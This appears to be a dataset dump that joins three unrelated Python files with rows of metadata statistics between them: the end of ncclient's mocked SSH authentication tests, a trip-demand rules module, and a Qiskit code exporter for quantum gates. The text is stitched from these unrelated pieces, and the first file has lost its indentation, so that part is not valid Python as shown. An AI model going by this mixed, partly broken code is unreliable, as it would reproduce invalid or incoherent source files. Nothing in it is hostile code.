mock_get_key.return_value = [key]
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', [], True, True)
self.assertEqual(
(mock_auth_public_key.call_args_list[0][0][1]).__repr__(),
key.__repr__())
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.agent.AgentSSH.get_keys')
def test_auth_agent_exception(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey()
mock_get_key.return_value = [key]
mock_auth_public_key.side_effect = paramiko.ssh_exception.AuthenticationException
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, [], True, False)
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_keyfiles(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey()
mock_get_key.return_value = key
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', ["key_file_name"], False, True)
self.assertEqual(
(mock_auth_public_key.call_args_list[0][0][1]).__repr__(),
key.__repr__())
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_keyfiles_exception(self, mock_get_key, mock_auth_public_key):
key = paramiko.PKey()
mock_get_key.side_effect = paramiko.ssh_exception.PasswordRequiredException
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, ["key_file_name"], False, True)
@patch('os.path.isfile')
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_default_keyfiles(self, mock_get_key, mock_auth_public_key,
mock_is_file):
key = paramiko.PKey()
mock_get_key.return_value = key
mock_is_file.return_value = True
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', [], False, True)
self.assertEqual(
(mock_auth_public_key.call_args_list[0][0][1]).__repr__(),
key.__repr__())
@patch('os.path.isfile')
@patch('paramiko.transport.Transport.auth_publickey')
@patch('paramiko.pkey.PKey.from_private_key_file')
def test_auth_default_keyfiles_exception(self, mock_get_key,
mock_auth_public_key, mock_is_file):
key = paramiko.PKey()
mock_is_file.return_value = True
mock_get_key.side_effect = paramiko.ssh_exception.PasswordRequiredException
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, [], False, True)
@patch('paramiko.transport.Transport.auth_password')
def test_auth_password(self, mock_auth_password):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._auth('user', 'password', [], False, True)
self.assertEqual(
mock_auth_password.call_args_list[0][0],
('user',
'password'))
@patch('paramiko.transport.Transport.auth_password')
def test_auth_exception(self, mock_auth_password):
mock_auth_password.side_effect = Exception
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth, 'user', 'password', [], False, True)
def test_auth_no_methods_exception(self):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
self.assertRaises(AuthenticationError,
obj._auth,'user', None, [], False, False)
@patch('paramiko.transport.Transport.close')
def test_close(self, mock_close):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._transport = paramiko.Transport(MagicMock())
obj._transport.active = True
obj._connected = True
obj.close()
mock_close.assert_called_once_with()
self.assertFalse(obj._connected)
@patch('paramiko.hostkeys.HostKeys.load')
def test_load_host_key(self, mock_load):
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj.load_known_hosts("file_name")
mock_load.assert_called_once_with("file_name")
@patch('os.path.expanduser')
@patch('paramiko.hostkeys.HostKeys.load')
def test_load_host_key_2(self, mock_load, mock_os):
mock_os.return_value = "file_name"
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj.load_known_hosts()
mock_load.assert_called_once_with("file_name")
@patch('os.path.expanduser')
@patch('paramiko.hostkeys.HostKeys.load')
def test_load_host_key_IOError(self, mock_load, mock_os):
mock_os.return_value = "file_name"
mock_load.side_effect = IOError
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj.load_known_hosts()
mock_load.assert_called_with("file_name")
@unittest.skipIf(sys.version_info.major == 2, "test not supported < Python3")
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.recv')
@patch('selectors.DefaultSelector.select')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def test_run_receive_py3(self, mock_error, mock_selector, mock_recv, mock_close):
mock_selector.return_value = True
mock_recv.return_value = 0
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
obj.run()
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
@unittest.skipIf(sys.version_info.major == 2, "test not supported < Python3")
def test_run_send_py3_10(self):
self._test_run_send_py3(NetconfBase.BASE_10,
lambda msg: msg.encode() + b"]]>]]>")
@unittest.skipIf(sys.version_info.major == 2, "test not supported < Python3")
def test_run_send_py3_11(self):
def chunker(msg):
encmsg = msg.encode()
chunks = b"\n#%i\n%b\n##\n" % (len(encmsg), encmsg)
return chunks
self._test_run_send_py3(NetconfBase.BASE_11, chunker)
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.send_ready')
@patch('paramiko.channel.Channel.send')
@patch('selectors.DefaultSelector.select')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def _test_run_send_py3(self, base, chunker, mock_error, mock_selector,
mock_send, mock_ready, mock_close):
mock_selector.return_value = False
mock_ready.return_value = True
mock_send.return_value = -1
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
msg = "naïve garçon"
obj._q.put(msg)
obj._base = base
obj.run()
self.assertEqual(mock_send.call_args_list[0][0][0], chunker(msg))
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
@unittest.skipIf(sys.version_info.major >= 3, "test not supported >= Python3")
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.recv')
@patch('selectors2.DefaultSelector')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def test_run_receive_py2(self, mock_error, mock_selector, mock_recv, mock_close):
mock_selector.select.return_value = True
mock_recv.return_value = 0
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
obj.run()
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
@unittest.skip("test currently non-functional")
@patch('ncclient.transport.ssh.SSHSession.close')
@patch('paramiko.channel.Channel.send_ready')
@patch('paramiko.channel.Channel.send')
@patch('selectors2.DefaultSelector')
@patch('ncclient.transport.ssh.Session._dispatch_error')
def test_run_send_py2(self, mock_error, mock_selector, mock_send, mock_ready, mock_close):
mock_selector.select.return_value = False
mock_ready.return_value = True
mock_send.return_value = -1
device_handler = JunosDeviceHandler({'name': 'junos'})
obj = SSHSession(device_handler)
obj._channel = paramiko.Channel("c100")
obj._q.put("rpc")
obj.run()
self.assertEqual(mock_send.call_args_list[0][0][0], "rpc]]>]]>")
self.assertTrue(
isinstance(
mock_error.call_args_list[0][0][0],
SessionCloseError))
| 41.013193 | 107 | 0.653435 | 1,827 | 15,544 | 5.287356 | 0.120963 | 0.05383 | 0.064182 | 0.072464 | 0.821118 | 0.797308 | 0.781159 | 0.752174 | 0.752174 | 0.728986 | 0 | 0.012479 | 0.221565 | 15,544 | 378 | 108 | 41.121693 | 0.785868 | 0.024833 | 0 | 0.665654 | 0 | 0.009119 | 0.218115 | 0.130116 | 0 | 0 | 0 | 0 | 0.085106 | 1 | 0.072948 | false | 0.042553 | 0.039514 | 0 | 0.118541 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13bdf5a6986e21b1ae54aaa2d2dcf067a0f73168 | 2,341 | py | Python | trip_exp/trip_rules.py | Behrouz-Babaki/notebooks | 9e84263879ba17e8581b8bdee60aaf3006fa4a73 | [
"Unlicense"
] | null | null | null | trip_exp/trip_rules.py | Behrouz-Babaki/notebooks | 9e84263879ba17e8581b8bdee60aaf3006fa4a73 | [
"Unlicense"
] | null | null | null | trip_exp/trip_rules.py | Behrouz-Babaki/notebooks | 9e84263879ba17e8581b8bdee60aaf3006fa4a73 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
from math import sqrt
def rain_factor(period):
if period.rain:
return 1.2
return 1
def dist_factor(reg1, reg2):
dist = 0
for i in range(2):
dist += (reg1.coordinates[i]-reg2.coordinates[i])**2
dist = sqrt(dist)
return 1/dist
def rule1(reg1, reg2, day, period, core_param):
if(period.number != 0 or
reg1.name == reg2.name or
day.weekday > 4):
return 0
return core_param * reg1.population * reg2.job_density * rain_factor(period)
def rule2(reg1, reg2, day, period, core_param):
if(period.number != 1 or
reg1.name == reg2.name or
day.weekday >4):
return 0
return core_param * reg1.job_density * reg2.population * rain_factor(period)
def rule3(reg1, reg2, day, period, core_param):
if (period.number != 0 or
reg1.name == reg2.name or
day.weekday > 4):
return 0
return core_param * reg1.population * reg2.service_density * dist_factor(reg1, reg2) * rain_factor(period)
def rule4(reg1, reg2, day, period, core_param):
if(period.number != 1 or
reg1.name == reg2.name or
day.weekday > 4):
return 0
return core_param * reg1.service_density * reg2.population * dist_factor(reg1, reg2) * rain_factor(period)
def rule5(reg1, reg2, day, period, core_param):
if(period.number != 1 or
reg1.name == reg2.name or
day.weekday > 4):
return 0
return core_param * reg1.population * reg2.service_density * dist_factor(reg1, reg2) * rain_factor(period)
def rule6(reg1, reg2, day, period, core_param):
if(period.number != 2 or
reg1.name == reg2.name or
day.weekday > 4):
return 0
return core_param * reg1.service_density * reg2.population * dist_factor(reg1, reg2) * rain_factor(period)
def rule7(reg1, reg2, day, period, core_param):
if(period.number != 1 or
reg1.name == reg2.name or
day.weekday > 4):
return 0
return core_param * reg1.population * reg2.fun_density * dist_factor(reg1, reg2) * rain_factor(period)
def rule8(reg1, reg2, day, period, core_param):
if(period.number != 2 or
reg1.name == reg2.name or
day.weekday > 4):
return 0
return core_param * reg1.fun_density * reg2.population * dist_factor(reg1, reg2) * rain_factor(period)
| 32.513889 | 110 | 0.644596 | 342 | 2,341 | 4.295322 | 0.134503 | 0.098026 | 0.098026 | 0.09258 | 0.797141 | 0.797141 | 0.797141 | 0.797141 | 0.797141 | 0.767189 | 0 | 0.057963 | 0.240923 | 2,341 | 71 | 111 | 32.971831 | 0.768711 | 0.008543 | 0 | 0.610169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169492 | false | 0 | 0.016949 | 0 | 0.508475 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
b92a8a372f721fda51e597257b00737876aaa56d | 22,073 | py | Python | uranium_quantum/circuit_exporter/qiskit-exporter.py | radumarg/uranium_quantum | e9e62046a2b2e2f31bcab661d48d4bd721ca111a | [
"MIT"
] | null | null | null | uranium_quantum/circuit_exporter/qiskit-exporter.py | radumarg/uranium_quantum | e9e62046a2b2e2f31bcab661d48d4bd721ca111a | [
"MIT"
] | null | null | null | uranium_quantum/circuit_exporter/qiskit-exporter.py | radumarg/uranium_quantum | e9e62046a2b2e2f31bcab661d48d4bd721ca111a | [
"MIT"
] | null | null | null | import importlib
import math
BaseExporter = importlib.import_module("uranium_quantum.circuit_exporter.base-exporter")
class Exporter(BaseExporter.BaseExporter):
def start_code(self):
return f"\
import numpy as np\n\
from qiskit import QuantumRegister\n\
from qiskit.circuit import ClassicalRegister\n\
from qiskit import QuantumCircuit, execute, Aer\n\
from qiskit.circuit.library.standard_gates import iswap\n\
from qiskit.circuit.library import RXXGate, RYYGate, RZZGate\n\
from qiskit.quantum_info.operators import Operator\n\
from qiskit.visualization import plot_histogram\n\
cr = ClassicalRegister({self._bits})\n\
qr = QuantumRegister({self._qubits})\n\
qc = QuantumCircuit(qr, cr)\n\n"
def end_code(self):
return f"\
# Using Aer's qasm_simulator\n\
simulator = Aer.get_backend('qasm_simulator')\n\n\
# Execute the circuit on the qasm simulator\n\
job = execute(qc, backend=simulator, shots=1000)\n\n\
# Grab results from the job\n\
result = job.result()\n\n\
print('Job result status', result.status)\n\
counts = result.get_counts(qc)\n\n\
# Note: you need to include some measure gates in your circuit in order to see some plots here:\n\
plot_histogram(counts)\n"
@staticmethod
def _gate_u3(
target, theta_radians, phi_radians, lambda_radians, add_comments=True
):
out = "# u3 gate\n" if add_comments else ""
out += f"qc.u({theta_radians}, {phi_radians}, {lambda_radians}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_u2(target, phi_radians, lambda_radians, add_comments=True):
out = "# u2 gate\n" if add_comments else ""
out += f"qc.u({math.pi/2}, {phi_radians}, {lambda_radians}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_u1(target, lambda_radians, add_comments=True):
out = "# u1 gate\n" if add_comments else ""
out += f"qc.p({lambda_radians}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_identity(target, add_comments=True):
out = "# identity gate\n" if add_comments else ""
out += f"qc.id(qr[{target}])\n\n"
return out
@staticmethod
def _gate_hadamard(target, add_comments=True):
out = "# hadamard gate\n" if add_comments else ""
out += f"qc.h(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_x(target, add_comments=True):
out = "# pauli-x gate\n" if add_comments else ""
out += f"qc.x(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_y(target, add_comments=True):
out = "# pauli-y gate\n" if add_comments else ""
out += f"qc.y(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_z(target, add_comments=True):
out = "# pauli-z gate\n" if add_comments else ""
out += f"qc.z(qr[{target}])\n\n"
return out
@staticmethod
def _gate_pauli_x_root(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-x-root gate\n" if add_comments else ""
out += f"pauli_x_root = np.exp(1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), -1j * np.sin(np.pi/(2*{root}))],\n\
[-1j * np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_x_root, [{target}], label='pauli-x-root')\n\n"
return out
@staticmethod
def _gate_pauli_y_root(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-y-root gate\n" if add_comments else ""
out += f"pauli_y_root = np.exp(1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), -np.sin(np.pi/(2*{root}))],\n\
[np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_y_root, [{target}], label='pauli-y-root')\n\n"
return out
@staticmethod
def _gate_pauli_z_root(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-z-root gate\n" if add_comments else ""
out += f"pauli_z_root = np.exp(1j * np.pi/{root}) * Operator([\n\
[1, 0],\n\
[0, np.exp(1j * np.pi/{root})],\n\
])\n\n"
out += f"qc.unitary(pauli_z_root, [{target}], label='pauli-z-root')\n\n"
return out
@staticmethod
def _gate_pauli_x_root_dagger(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-x-root-dagger gate\n" if add_comments else ""
out += f"pauli_x_root_dagger = np.exp(-1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), 1j * np.sin(np.pi/(2*{root}))],\n\
[1j * np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_x_root_dagger, [{target}], label='pauli-x-root-dagger')\n\n"
return out
@staticmethod
def _gate_pauli_y_root_dagger(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli-y-root-dagger gate\n" if add_comments else ""
out += f"pauli_y_root_dagger = np.exp(-1j * np.pi/(2*{root})) * Operator([\n\
[np.cos(np.pi/(2*{root})), - np.sin(np.pi/(2*{root}))],\n\
[np.sin(np.pi/(2*{root})), np.cos(np.pi/(2*{root}))],\n\
])\n\n"
out += f"qc.unitary(pauli_y_root_dagger, [{target}], label='pauli-y-root-dagger')\n\n"
return out
@staticmethod
def _gate_pauli_z_root_dagger(target, root, add_comments=True):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# pauli_z-root-dagger gate\n" if add_comments else ""
out += f"pauli_z_root_dagger = Operator([\n\
[1, 0],\n\
[0, np.exp(-1j * np.pi/{root})],\n\
])\n\n"
out += f"qc.unitary(pauli_z_root_dagger, [{target}], label='pauli-z-root-dagger')\n\n"
return out
@staticmethod
def _gate_sqrt_not(target, add_comments=True):
out = "# sqrt-not gate\n" if add_comments else ""
out += f"qc.sx(qr[{target}])\n\n"
return out
@staticmethod
def _gate_t(target, add_comments=True):
out = "# t gate\n" if add_comments else ""
out += f"qc.t(qr[{target}])\n\n"
return out
@staticmethod
def _gate_t_dagger(target, add_comments=True):
out = "# t-dagger gate\n" if add_comments else ""
out += f"qc.tdg(qr[{target}])\n\n"
return out
@staticmethod
def _gate_rx_theta(target, theta, add_comments=True):
out = "# rx-theta gate\n" if add_comments else ""
out += f"qc.rx({theta}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_ry_theta(target, theta, add_comments=True):
out = "# ry-theta gate\n" if add_comments else ""
out += f"qc.ry({theta}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_rz_theta(target, theta, add_comments=True):
out = "# rz-theta gate\n" if add_comments else ""
out += f"qc.rz({theta}, qr[{target}])\n\n"
return out
@staticmethod
def _gate_s(target, add_comments=True):
out = "# s gate\n" if add_comments else ""
out += f"qc.s(qr[{target}])\n\n"
return out
@staticmethod
def _gate_s_dagger(target, add_comments=True):
out = "# s-dagger gate\n" if add_comments else ""
out += f"qc.sdg(qr[{target}])\n\n"
return out
@staticmethod
def _gate_swap(target, target2, add_comments=True):
out = "# swap gate\n" if add_comments else ""
out += f"qc.swap(qr[{target}], qr[{target2}])\n\n"
return out
@staticmethod
def _gate_iswap(target, target2, add_comments=True):
out = "# iswap gate\n" if add_comments else ""
out += f"qc.iswap(qr[{target}], qr[{target2}])\n\n"
return out
@staticmethod
def _gate_swap_phi(target, target2, phi, add_comments=True):
out = "# swap-phi gate\n" if add_comments else ""
out += f"swap_phi = Operator([\n\
[1, 0, 0, 0],\n\
[0, 0, np.exp(1j * {phi}), 0],\n\
[0, np.exp(1j * {phi}), 0, 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(swap_phi, [{target}, {target2}], label='swap-phi')\n\n"
return out
@staticmethod
def _gate_sqrt_swap(target, target2, add_comments=True):
out = "# sqrt-swap gate\n" if add_comments else ""
out += f"qc.u({math.pi/2}, {math.pi/2}, {-math.pi}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, {-math.pi/2}, {math.pi}, qr[{target2}])\n"
out += f"qc.cx(qr[{target}], qr[{target2}])\n"
out += f"qc.u({math.pi/4}, {-math.pi/2}, {-math.pi/2}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, 0, {1.75 * math.pi}, qr[{target2}])\n"
out += f"qc.cx(qr[{target}], qr[{target2}])\n"
out += f"qc.u({math.pi/4}, {-math.pi}, {-math.pi/2}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, {math.pi}, {math.pi/2}, qr[{target2}])\n"
out += f"qc.cx(qr[{target}], qr[{target2}])\n"
out += f"qc.u({math.pi/2}, 0, {-1.5 * math.pi}, qr[{target}])\n"
out += f"qc.u({math.pi/2}, {math.pi/2}, 0, qr[{target2}])\n\n"
return out
@staticmethod
def _gate_xx(target, target2, theta, add_comments=True):
out = "# xx gate\n" if add_comments else ""
out += f"qc.append(RXXGate({theta}), [{target}, {target2}])\n\n"
return out
@staticmethod
def _gate_yy(target, target2, theta, add_comments=True):
out = "# yy gate\n" if add_comments else ""
out += f"qc.append(RYYGate({theta}), [{target}, {target2}])\n\n"
return out
@staticmethod
def _gate_zz(target, target2, theta, add_comments=True):
out = "# zz gate\n" if add_comments else ""
out += f"qc.append(RZZGate({theta}), [{target}, {target2}])\n\n"
return out
@staticmethod
def _gate_ctrl_hadamard(control, target, controlstate, add_comments=True):
out = "# ctrl-hadamard gate\n" if add_comments else ""
out += f"qc.ch(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_u3(
control,
target,
controlstate,
theta_radians,
phi_radians,
lambda_radians,
add_comments=True,
):
out = "# ctrl-u3 gate\n" if add_comments else ""
out += f"qc.cu({theta_radians}, {phi_radians}, {lambda_radians}, {math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_u2(
control, target, controlstate, phi_radians, lambda_radians, add_comments=True
):
out = "# ctrl-u2 gate\n" if add_comments else ""
out += f"qc.cu({math.pi/2}, {phi_radians}, {lambda_radians}, {math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_u1(
control, target, controlstate, lambda_radians, add_comments=True
):
out = "# ctrl-u1 gate\n" if add_comments else ""
out += f"qc.cp({lambda_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_t(control, target, controlstate, add_comments=True):
out = "# ctrl-t gate\n" if add_comments else ""
out += f"qc.cp({math.pi/4}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_t_dagger(control, target, controlstate, add_comments=True):
out = "# ctrl-t-dagger gate\n" if add_comments else ""
out += f"qc.cp({-math.pi/4}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_x(control, target, controlstate, add_comments=True):
out = "# ctrl-pauli-x gate\n" if add_comments else ""
out += f"qc.cx(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_y(control, target, controlstate, add_comments=True):
out = "# ctrl-pauli-y gate\n" if add_comments else ""
out += f"qc.cy(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_z(control, target, controlstate, add_comments=True):
out = "# ctrl-pauli-z gate\n" if add_comments else ""
out += f"qc.cz(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_x_root(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-x-root gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_x_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, -1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, -1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_x_root = Operator([\n\
[np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, -1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[-1j * np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_x_root, [{control}, {target}], label='ctrl-pauli-x-root')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_y_root(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-y-root gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_y_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, - np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_y_root = Operator([\n\
[np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, - np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[np.exp(1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_y_root, [{control}, {target}], label='ctrl-pauli-y-root')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_z_root(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-z-root gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_z_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, 1, 0],\n\
[0, 0, 0, np.exp(1j * np.pi/{root})],\n\
])\n"
else:
out += f"ctrl_pauli_z_root = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, np.exp(1j * np.pi/{root}), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_z_root, [{control}, {target}], label='ctrl-pauli-z-root')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_x_root_dagger(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-x-root-dagger gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_x_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, 1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, 1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_x_root_dagger = Operator([\n\
[np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, 1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[1j * np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_x_root_dagger, [{control}, {target}], label='ctrl-pauli-x-root-dagger')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_y_root_dagger(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-y-root-dagger gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_y_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root}))],\n\
[0, 0, 1, 0],\n\
[0, np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root}))],\n\
])\n"
else:
out += f"ctrl_pauli_y_root_dagger = Operator([\n\
[np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0],\n\
[0, 1, 0, 0],\n\
[np.exp(-1j * np.pi/(2*{root})) * np.sin(np.pi/(2*{root})), 0, np.exp(-1j * np.pi/(2*{root})) * np.cos(np.pi/(2*{root})), 0],\n\
[0, 0, 0, 1],\n\
])\n"
